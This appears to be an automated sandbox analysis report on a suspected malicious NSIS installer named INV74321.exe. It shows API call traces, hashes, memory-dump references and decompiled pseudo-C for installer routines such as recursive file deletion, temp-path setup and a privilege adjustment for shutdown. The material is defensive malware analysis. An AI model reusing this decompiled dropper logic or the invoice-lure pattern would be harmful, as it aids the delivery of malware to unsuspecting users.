                                                          • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                          • OleInitialize.OLE32(00000000), ref: 004033E9
                                                          • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                          • GetCommandLineA.KERNEL32(accumulate Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\INV74321.exe" ,00000020,"C:\Users\user\Desktop\INV74321.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                          • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                            • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                            • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                            • Part of subcall function 0040390A: GetUserDefaultUILanguage.KERNELBASE(00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV74321.exe" ,00000000), ref: 00403924
                                                            • Part of subcall function 0040390A: lstrlenA.KERNEL32(GHFGHFGHFDGDFGDFg,?,?,?,GHFGHFGHFDGDFGDFg,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,74B5FA90), ref: 004039FA
                                                            • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe,GHFGHFGHFDGDFGDFg,?,?,?,GHFGHFGHFDGDFGDFg,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
                                                            • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(GHFGHFGHFDGDFGDFg), ref: 00403A18
                                                            • Part of subcall function 0040390A: LoadImageA.USER32 ref: 00403A61
                                                            • Part of subcall function 0040390A: RegisterClassA.USER32 ref: 00403A9E
                                                            • Part of subcall function 00403830: CloseHandle.KERNEL32(000002C0,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                          • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                          • ExitProcess.KERNEL32 ref: 00403688
                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                          • ExitProcess.KERNEL32 ref: 0040382A
                                                            • Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
                                                          • String ID: "$"C:\Users\user\Desktop\INV74321.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\INV74321.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$accumulate Setup$~nsu
                                                          • API String ID: 1314998376-3653219216
                                                          • Opcode ID: 92f4727230b5494df4ae19d242d75775fcc962e9ce705fe20936cac325b27094
                                                          • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                          • Opcode Fuzzy Hash: 92f4727230b5494df4ae19d242d75775fcc962e9ce705fe20936cac325b27094
                                                          • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004058BF, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 98%
                                                          			E004058BF(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405B7D(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4c8 =  *0x42f4c8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E004060F7(0x42b898, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405AD6(_t73);
					} else {
						lstrcatA(0x42b898, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x42b898,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405ABA( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E004060F7(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E00405877(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E0040521E(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4c8 =  *0x42f4c8 + 1;
										} else {
											E0040521E(0xfffffff1, _t73);
											E00405ED6(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004058BF(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b898 - 0x5c;
					if( *0x42b898 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E0040646B(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405A8F(_t73);
							_t40 = E00405877(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E0040521E(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E0040521E(0xfffffff1, _t73);
							return E00405ED6(_t72, _t73, 0);
						}
						L33:
						 *0x42f4c8 =  *0x42f4c8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                                          0x004058c9
                                                          0x004058ce
                                                          0x004058d7
                                                          0x004058da
                                                          0x004058e2
                                                          0x004058e5
                                                          0x004058e8
                                                          0x004058f0
                                                          0x004058f2
                                                          0x004058f3
                                                          0x00000000
                                                          0x004058f3
                                                          0x004058fe
                                                          0x00405901
                                                          0x00405901
                                                          0x00405901
                                                          0x00405905
                                                          0x00405918
                                                          0x0040591f
                                                          0x00405924
                                                          0x00405928
                                                          0x00405938
                                                          0x0040592a
                                                          0x00405930
                                                          0x00405930
                                                          0x0040593d
                                                          0x00405940
                                                          0x0040594b
                                                          0x00405951
                                                          0x00405956
                                                          0x00405966
                                                          0x00405968
                                                          0x0040596e
                                                          0x00405971
                                                          0x00405974
                                                          0x00405a2c
                                                          0x00405a2c
                                                          0x00405a30
                                                          0x00405a32
                                                          0x00405a32
                                                          0x00405a32
                                                          0x00405a32
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040597a
                                                          0x0040597a
                                                          0x00405983
                                                          0x00405989
                                                          0x0040598e
                                                          0x00405991
                                                          0x00405993
                                                          0x00405997
                                                          0x00405999
                                                          0x00405999
                                                          0x00405997
                                                          0x0040599c
                                                          0x0040599f
                                                          0x004059b2
                                                          0x004059b4
                                                          0x004059b9
                                                          0x004059c0
                                                          0x004059db
                                                          0x004059e0
                                                          0x004059e2
                                                          0x00405a06
                                                          0x004059e4
                                                          0x004059e4
                                                          0x004059e7
                                                          0x004059fb
                                                          0x004059e9
                                                          0x004059ec
                                                          0x004059f4
                                                          0x004059f4
                                                          0x004059e7
                                                          0x004059c2
                                                          0x004059c8
                                                          0x004059ca
                                                          0x004059d0
                                                          0x004059d0
                                                          0x004059ca
                                                          0x00000000
                                                          0x004059c0
                                                          0x004059a1
                                                          0x004059a4
                                                          0x004059a6
                                                          0x00000000
                                                          0x00000000
                                                          0x004059a8
                                                          0x004059aa
                                                          0x00000000
                                                          0x00000000
                                                          0x004059ac
                                                          0x004059b0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405a0b
                                                          0x00405a15
                                                          0x00405a1b
                                                          0x00405a1b
                                                          0x00405a26
                                                          0x00000000
                                                          0x00405a26
                                                          0x00405942
                                                          0x00405949
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405907
                                                          0x00405907
                                                          0x00405909
                                                          0x00405a36
                                                          0x00405a38
                                                          0x00405a3b
                                                          0x00405a8c
                                                          0x00405a8c
                                                          0x00405a8c
                                                          0x00405a3d
                                                          0x00405a40
                                                          0x00405a4b
                                                          0x00405a50
                                                          0x00405a52
                                                          0x00000000
                                                          0x00000000
                                                          0x00405a55
                                                          0x00405a61
                                                          0x00405a66
                                                          0x00405a68
                                                          0x00000000
                                                          0x00405a83
                                                          0x00405a6a
                                                          0x00405a6d
                                                          0x00000000
                                                          0x00000000
                                                          0x00405a72
                                                          0x00000000
                                                          0x00405a79
                                                          0x00405a42
                                                          0x00405a42
                                                          0x00000000
                                                          0x00405a42
                                                          0x0040590f
                                                          0x00405912
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405912

                                                          APIs
                                                          • DeleteFileA.KERNELBASE(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                          • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                          • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                          • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                          • FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                          • FindClose.KERNEL32(00000000), ref: 00405A26
                                                          Strings
                                                          • "C:\Users\user\Desktop\INV74321.exe" , xrefs: 004058BF
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                                                          • \*.*, xrefs: 0040592A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\Desktop\INV74321.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                          • API String ID: 2035342205-1228882293
                                                          • Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                          • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                          • Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                          • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040646B, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0040646B(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0e0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c0e0;
			}




                                                          0x00406476
                                                          0x0040647f
                                                          0x00000000
                                                          0x0040648c
                                                          0x00406482
                                                          0x00000000

                                                          APIs
                                                          • FindFirstFileA.KERNELBASE(74B5FA90,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74B5FA90,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                          • FindClose.KERNEL32(00000000), ref: 00406482
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                          • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                          • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                          • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403CA7, Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 84%
                                                          			E00403CA7(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a878 = _t35;
					if(_t116 == 0x110) {
						 *0x42f428 = _t126;
						 *0x42a88c = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429858 = _t92;
						E0040417B(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ec08); // executed
						 *0x42ebec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a878 = 1;
					}
					_t123 =  *0x40a1dc; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f460;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E004041C7(0x40b);
						while(1) {
							_t37 =  *0x42a878;
							 *0x40a1dc =  *0x40a1dc + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1dc; // 0xffffffff
							__eflags = _t39 -  *0x42f464;
							if(_t39 ==  *0x42f464) {
								E0040140B(1);
							}
							__eflags =  *0x42ebec - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1dc -  *0x42f464; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E0040618A(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E0040417B(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E0040417B(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E0040417B(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4cc - _t134;
							_v32 = _t49;
							if( *0x42f4cc != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E0040419D(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429858, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x42f4cc - _t134;
							if( *0x42f4cc == _t134) {
								_push( *0x42a88c);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429858);
							}
							E004041B0();
							E004060F7(0x42a890, E00403C88());
							E0040618A(0x42a890, _t126, _t131,  &(0x42a890[lstrlenA(0x42a890)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a890);
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ebf8);
									 *0x42a068 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x42f420,  *_t131 +  *0x42ec00 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x42ebf8 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E0040417B(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ebf8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ebec - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42ebf8, 8);
									E004041C7(0x405);
									goto L58;
								}
								__eflags =  *0x42f4cc - _t134;
								if( *0x42f4cc != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4c0 - _t134;
								if( *0x42f4c0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ebf8);
						 *0x42f428 = _t134;
						EndDialog(_t126,  *0x429c60);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ebf8, 0x40f, 0, 1);
						__eflags =  *0x42ebec - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a870, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a870,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E004041E2(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ebf8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4cc - _t134;
										if( *0x42f4cc == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c60 = 1;
											L21:
											_push(0x78);
											L22:
											E00404154();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c60 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1dc - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ebf8);
						 *0x42ebf8 = _a12;
						L58:
						if( *0x42b890 == _t134) {
							_t143 =  *0x42ebf8 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x42b890 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}































                                                          0x00403cb0
                                                          0x00403cb9
                                                          0x00403dfa
                                                          0x00403dfe
                                                          0x00403e02
                                                          0x00403e04
                                                          0x00403e09
                                                          0x00403e14
                                                          0x00403e1f
                                                          0x00403e24
                                                          0x00403e26
                                                          0x00403e28
                                                          0x00403e2b
                                                          0x00403e30
                                                          0x00403e3e
                                                          0x00403e4b
                                                          0x00403e52
                                                          0x00403e52
                                                          0x00403e53
                                                          0x00403e53
                                                          0x00403e58
                                                          0x00403e5e
                                                          0x00403e65
                                                          0x00403e6b
                                                          0x00403e6d
                                                          0x00403ead
                                                          0x00403eb2
                                                          0x00403eb7
                                                          0x00403eb7
                                                          0x00403ebc
                                                          0x00403ec5
                                                          0x00403ec7
                                                          0x00403ecc
                                                          0x00403ed2
                                                          0x00403ed6
                                                          0x00403ed6
                                                          0x00403edb
                                                          0x00403ee1
                                                          0x00000000
                                                          0x00000000
                                                          0x00403eec
                                                          0x00403ef2
                                                          0x00000000
                                                          0x00000000
                                                          0x00403efb
                                                          0x00403f03
                                                          0x00403f08
                                                          0x00403f0b
                                                          0x00403f11
                                                          0x00403f16
                                                          0x00403f19
                                                          0x00403f1f
                                                          0x00403f24
                                                          0x00403f27
                                                          0x00403f2d
                                                          0x00403f35
                                                          0x00403f3b
                                                          0x00403f41
                                                          0x00403f45
                                                          0x00403f4c
                                                          0x00403f4c
                                                          0x00403f4c
                                                          0x00403f56
                                                          0x00403f68
                                                          0x00403f74
                                                          0x00403f79
                                                          0x00403f83
                                                          0x00403f89
                                                          0x00403f8b
                                                          0x00403f90
                                                          0x00403f8d
                                                          0x00403f8d
                                                          0x00403f8d
                                                          0x00403fa0
                                                          0x00403fb8
                                                          0x00403fba
                                                          0x00403fc0
                                                          0x00403fd5
                                                          0x00403fc2
                                                          0x00403fcb
                                                          0x00403fcd
                                                          0x00403fcd
                                                          0x00403fdb
                                                          0x00403fec
                                                          0x00403ffd
                                                          0x00404004
                                                          0x0040400a
                                                          0x0040400e
                                                          0x00404013
                                                          0x00404015
                                                          0x00000000
                                                          0x0040401b
                                                          0x0040401b
                                                          0x0040401d
                                                          0x00000000
                                                          0x00000000
                                                          0x00404023
                                                          0x00404027
                                                          0x0040404c
                                                          0x00404052
                                                          0x00404058
                                                          0x0040405a
                                                          0x00000000
                                                          0x00000000
                                                          0x00404080
                                                          0x00404086
                                                          0x00404088
                                                          0x0040408d
                                                          0x00000000
                                                          0x00000000
                                                          0x00404093
                                                          0x00404096
                                                          0x00404099
                                                          0x004040b0
                                                          0x004040bc
                                                          0x004040d5
                                                          0x004040db
                                                          0x004040df
                                                          0x004040e4
                                                          0x004040ea
                                                          0x00000000
                                                          0x00000000
                                                          0x004040f4
                                                          0x004040ff
                                                          0x00000000
                                                          0x004040ff
                                                          0x00404029
                                                          0x0040402f
                                                          0x00000000
                                                          0x00000000
                                                          0x00404035
                                                          0x0040403b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404041
                                                          0x00404015
                                                          0x0040410c
                                                          0x00404118
                                                          0x0040411f
                                                          0x00000000
                                                          0x00403e6f
                                                          0x00403e6f
                                                          0x00403e72
                                                          0x00403ea5
                                                          0x00403ea5
                                                          0x00403ea7
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403ea7
                                                          0x00403e74
                                                          0x00403e78
                                                          0x00403e7d
                                                          0x00403e7f
                                                          0x00000000
                                                          0x00000000
